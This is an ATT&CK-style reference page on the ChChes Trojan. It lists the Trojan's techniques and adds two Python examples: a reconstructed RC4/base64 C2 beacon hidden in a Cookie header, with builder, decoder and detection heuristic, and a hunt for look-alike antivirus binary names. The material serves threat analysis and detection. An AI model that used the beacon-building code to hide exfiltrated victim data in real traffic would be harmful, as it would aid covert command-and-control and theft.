ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [1][2][3]

ID: S0144
Associated Software: Scorpion, HAYMAKER

Platforms: Windows

Version: 1.0

Associated Software Descriptions

HAYMAKER: Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. [4][5]

Techniques Used

Domain | ID | Name | Use
Enterprise | T1116 | Code Signing | ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked. [1][2][3]
Enterprise | T1003 | Credential Dumping | ChChes steals credentials stored inside Internet Explorer. [3]
Enterprise | T1024 | Custom Cryptographic Protocol | ChChes can encrypt C2 data with a custom technique using MD5, base64-encoding, and RC4. [1][2]
Enterprise | T1089 | Disabling Security Tools | ChChes can alter the victim's proxy configuration. [3]
Enterprise | T1083 | File and Directory Discovery | ChChes collects the victim's %TEMP% directory path and version of Internet Explorer. [4]
Enterprise | T1036 | Masquerading | ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe). [3]
Enterprise | T1057 | Process Discovery | ChChes collects its process identifier (PID) on the victim. [1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | ChChes establishes persistence by adding a Registry Run key. [3]
Enterprise | T1105 | Remote File Copy | ChChes is capable of downloading files, including additional modules. [1][2][4]
Enterprise | T1071 | Standard Application Layer Protocol | ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header. [1][2]
Enterprise | T1032 | Standard Cryptographic Protocol | ChChes can encrypt C2 traffic with AES. [1][2]
Enterprise | T1082 | System Information Discovery | ChChes collects the victim hostname, window resolution, and Microsoft Windows version. [1][3]
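The T1024 and T1071 rows above describe a layered C2 encoding (RC4, MD5, base64) whose output rides in the HTTP Cookie header. The following is an added example, not ChChes code and not the key schedule or cookie layout documented for it: it assumes the RC4 key is the MD5 digest of a per-victim seed, that the ciphertext is base64-encoded into a cookie named uid, and it pairs the beacon builder with the analyst-side decoder and a log-hunting heuristic for long opaque cookie values. All names, thresholds and the sample payload are constructed for the illustration.

```python
"""Layered C2 encoding in the style the page attributes to ChChes:
RC4 -> base64 -> Cookie header.  Added example; the key derivation
(MD5 of a seed) and the cookie name 'uid' are ASSUMPTIONS, not the
malware's documented algorithm."""
import base64
import hashlib
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA).  Encryption and decryption are the same
    operation, so one function serves both directions."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def derive_key(seed: str) -> bytes:
    """ASSUMED key schedule: RC4 key = MD5(seed).  MD5 is used here only
    to stretch an arbitrary string into a fixed 16-byte key."""
    return hashlib.md5(seed.encode()).digest()


def encode_beacon(seed: str, payload: bytes) -> str:
    """Encrypt the beacon and base64 it so it survives as a cookie value."""
    return base64.b64encode(rc4(derive_key(seed), payload)).decode()


def build_request(host: str, seed: str, payload: bytes) -> str:
    """Implant side: a GET whose only unusual feature is the Cookie value."""
    return (
        f"GET /index.php HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: uid={encode_beacon(seed, payload)}\r\n\r\n"
    )


def extract_cookie(raw_request: str) -> str:
    """Pull the Cookie header value out of a captured request."""
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no Cookie header in request")


def decode_request(seed: str, raw_request: str) -> bytes:
    """Analyst side: recover the plaintext beacon given the seed.  The
    partition on the first '=' keeps base64 padding ('=') intact."""
    _name, _sep, value = extract_cookie(raw_request).partition("=")
    return rc4(derive_key(seed), base64.b64decode(value))


def cookie_looks_opaque(cookie: str, min_len: int = 32) -> bool:
    """Hunting heuristic for proxy logs: a single cookie whose value is one
    long, pure-base64 blob (no second name=value pair) is worth a look.
    Threshold is a constructed starting point, not a tuned detector."""
    _name, sep, value = cookie.partition("=")
    return bool(sep) and len(value) >= min_len and \
        re.fullmatch(r"[A-Za-z0-9+/]+=*", value) is not None


# Constructed sample beacon, shaped like the discovery data the page lists.
SAMPLE_SEED = "victim-01"
SAMPLE_PAYLOAD = b"hostname=WIN7-PC;pid=1234;ie=11"


if __name__ == "__main__":
    req = build_request("example.invalid", SAMPLE_SEED, SAMPLE_PAYLOAD)
    print(req)
    print("opaque cookie:", cookie_looks_opaque(extract_cookie(req)))
    print("decoded:", decode_request(SAMPLE_SEED, req))
```

Without the seed the decoder cannot recover the beacon, which is the point of keying RC4 from per-victim data; the hunting heuristic therefore works on shape (one long base64 value, no normal cookie structure) rather than content, and will need tuning against sites that legitimately issue large opaque session tokens.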

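The T1036 row notes a file name that imitates a Norton Antivirus binary with letters reversed (notron.exe). A practical hunt for that pattern is to flag image names that are anagrams of, or within a small edit distance of, a known vendor binary name without matching it exactly. The example below is added here and is not part of ChChes reporting; the allow-list of binary names and the process listing are constructed for illustration.

```python
"""Hunt for near-miss look-alikes of known security-product binaries
(the 'notron.exe' pattern).  Added example; KNOWN_BINARIES and
SAMPLE_PROCESSES are constructed, not taken from any report."""
import ntpath

# Constructed allow-list of legitimate image names to compare against.
KNOWN_BINARIES = {"norton.exe", "msmpeng.exe", "avp.exe"}

# Constructed process listing as an EDR or Sysmon export might show it.
SAMPLE_PROCESSES = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\explorer.exe",
    r"C:\Program Files\Norton\norton.exe",   # exact match: legitimate
    r"C:\Users\Public\notron.exe",           # letters reversed: suspect
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with a rolling single-row table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def lookalike_of(path: str, known=KNOWN_BINARIES, max_dist: int = 2):
    """Return the known binary this image name imitates, or None.
    ntpath handles Windows separators even when run on a non-Windows host.
    Two checks: same letters in a different order (reversal/transposition),
    or a few edits away.  Exact matches are legitimate and are skipped."""
    name = ntpath.basename(path).lower()
    if name in known:
        return None
    for legit in known:
        if sorted(name) == sorted(legit) or edit_distance(name, legit) <= max_dist:
            return legit
    return None


def hunt(processes):
    """Pair each suspicious image path with the binary it resembles."""
    hits = []
    for path in processes:
        target = lookalike_of(path)
        if target is not None:
            hits.append((path, target))
    return hits


if __name__ == "__main__":
    for path, target in hunt(SAMPLE_PROCESSES):
        print(f"{path} resembles {target}")
```

An edit-distance threshold of 2 is generous for short names (a three-letter stem like avp.exe is within two edits of many unrelated names), so in practice scale the threshold with the stem length or restrict the allow-list to longer vendor binaries, and confirm a hit against the file's path and signer before acting on it.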

Groups that use this software: